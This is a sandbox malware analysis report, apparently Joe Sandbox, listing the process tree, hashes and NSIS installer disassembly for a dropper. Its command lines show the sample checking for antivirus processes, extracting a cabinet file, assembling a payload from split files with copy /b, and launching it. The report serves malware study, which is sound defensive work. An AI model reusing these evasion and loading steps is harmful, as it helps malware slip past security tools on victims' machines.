Path:	C:\Users\user\Desktop\vUcZzNWkKc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\vUcZzNWkKc.exe"
Imagebase:	0x610000
File size:	7'088'640 bytes
MD5 hash:	2882EAD03A58608F2F73C66B861299A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:33:12
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Imagebase:	0x400000
File size:	1'062'983 bytes
MD5 hash:	A3E9A86D6EDE94C3C71D1F7EEA537766
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:33:13
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0xdf0000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 70%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:33:13
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:33:13
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:33:15
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xb40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:33:15
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x970000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:33:16
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xb40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:33:16
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x970000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:33:18
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 768400
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:33:18
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Reflect
Imagebase:	0xcf0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:33:19
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "cocks" Articles
Imagebase:	0x970000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:33:19
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:33:19
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\768400\Climb.com
Wow64 process (32bit):	true
Commandline:	Climb.com V
Imagebase:	0xa20000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	03:33:19
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x5b0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 05390A08 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

8bq, xrefs: 05390C4F

Memory Dump Source

Source File: 00000000.00000002.1755865586.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_vUcZzNWkKc.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 8a5240be9df7a7f5f99d2d2433717d3f49119b0f5654b58c247032d9bc484268
Instruction ID: 404307ebfc6026a9e300904e947a758ce38123b5f6f616a834e233dc9717559f
Opcode Fuzzy Hash: 8a5240be9df7a7f5f99d2d2433717d3f49119b0f5654b58c247032d9bc484268
Instruction Fuzzy Hash: A4618C717142009FCB1CEB69E08DA29BBA7BF88304F558469E54A9B391DF70EC45CBD2

Function 05390590 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755865586.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_vUcZzNWkKc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e19f86b388a14991f4d4964fb6f00ba8eb0929a28a3e48d9c2446582cf7b9ccf
Instruction ID: f25fcc42650652f3f5f4f79ce831d213eb3fb5567e20587814a4f5cf059e2eec
Opcode Fuzzy Hash: e19f86b388a14991f4d4964fb6f00ba8eb0929a28a3e48d9c2446582cf7b9ccf
Instruction Fuzzy Hash: 89514B34A00349CFCB06DFB8E59569EBBB2FF45308F108569D004AB394EB35A94ACF91

Function 05390848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755865586.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_vUcZzNWkKc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e11fa3e0519aa6f9bfc23fc4933c8740c6791b4b218b173d3ebdf05190586ee1
Instruction ID: 1900c4b8f50843c4026289f1c2cd7069fa0fb1735572b0bc7881d7ce588edaa2
Opcode Fuzzy Hash: e11fa3e0519aa6f9bfc23fc4933c8740c6791b4b218b173d3ebdf05190586ee1
Instruction Fuzzy Hash: 92411D34A00309CFCB05DFA8E595A9EBBB2FF45308F508569D504AB394EB35A94ACF91

Function 05390C90 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755865586.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5390000_vUcZzNWkKc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93d2adabb78f4633055a120404e7ee991e266f5634b246c1caf2c733cf548c9
Instruction ID: afabd710f0eacf4f37ad8e60e6afdff0f1e07df4f4550142a8b1f78c99e56d1c
Opcode Fuzzy Hash: b93d2adabb78f4633055a120404e7ee991e266f5634b246c1caf2c733cf548c9
Instruction Fuzzy Hash: DF31FFB57042158BCF08DBADD988AAEBBE6EF84214F148026E519D7341DB30EE468BD1

Analysis Process: PasoCattle.exePID: 7692, Parent PID: 7504COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	26

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

NCRC, xrefs: 004039A8
/D=, xrefs: 004039D2
Error launching installer, xrefs: 00403AA9
NSIS Error, xrefs: 0040390E
_?=, xrefs: 00403A90
SeShutdownPrivilege, xrefs: 00403C42
\Temp, xrefs: 00403A47
~nsu.tmp, xrefs: 00403B23

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename: %s, xrefs: 004018F8
Rename on reboot: %s, xrefs: 00401943
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Sleep(%d), xrefs: 0040169D
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: "%s" (%d), xrefs: 004017BF
Jump: %d, xrefs: 00401602
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
detailprint: %s, xrefs: 00401679
Aborting: "%s", xrefs: 0040161D
Rename failed: %s, xrefs: 0040194B
BringToFront, xrefs: 004016BD
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: "%s" created, xrefs: 00401849
SetFileAttributes failed., xrefs: 004017A1
Call: %d, xrefs: 0040165A

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

